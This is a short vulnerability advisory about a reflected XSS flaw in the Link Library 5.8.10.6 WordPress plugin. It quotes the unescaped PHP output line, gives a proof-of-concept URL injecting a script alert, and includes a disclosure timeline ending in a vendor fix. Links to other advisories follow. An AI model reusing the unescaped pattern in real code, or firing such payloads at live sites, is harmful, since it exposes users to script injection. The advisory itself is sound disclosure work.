08-11-2014 / Vulnerabilities

Link Library 5.8.10.6 Reflected XSS

$_GET['searchll'] is not escaped.

File: link-library\render-link-library-sc.php

if ( 'search' == $mode ) {
    $output .= '<div class="resulttitle">' . __('Search Results for', 'link-library') . ' "' . stripslashes( $_GET['searchll'] ) . '"</div>';
}

Proof of Concept

XSS will be visible on page with [link-library settings=1] tag.

http://wordpress_install/page_with_tag/?searchll=word_that_must_found_some_link <script>alert("XSS");</script>

XSS will be visible only if search function return something.

So we can use popular letter ("a" or "e") and after space put XSS. For example:

http://wordpress_install/page_with_tag/?searchll=a <script>alert("XSS");</script>

Timeline

06-11-2014: Discovered
06-11-2014: Vendor notified
07-11-2014: Version 5.8.11 released, issue resolved

Vulnerabilities

Kallithea <= 0.3.4 Incorrect access control and XSS

This vulnerability allows a normal user to modify the permissions of repositories that he normally shouldn’t have access to.

12-12-2018

2 MIN READ

Vulnerabilities

Gitea 1.4.0 Unauthenticated Remote Code Execution

This is part 1 of 3 about bugs inside Gitea

05-07-2018

5 MIN READ

Vulnerabilities

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

How to create a Metasploit module in example?

28-06-2018

1 MIN READ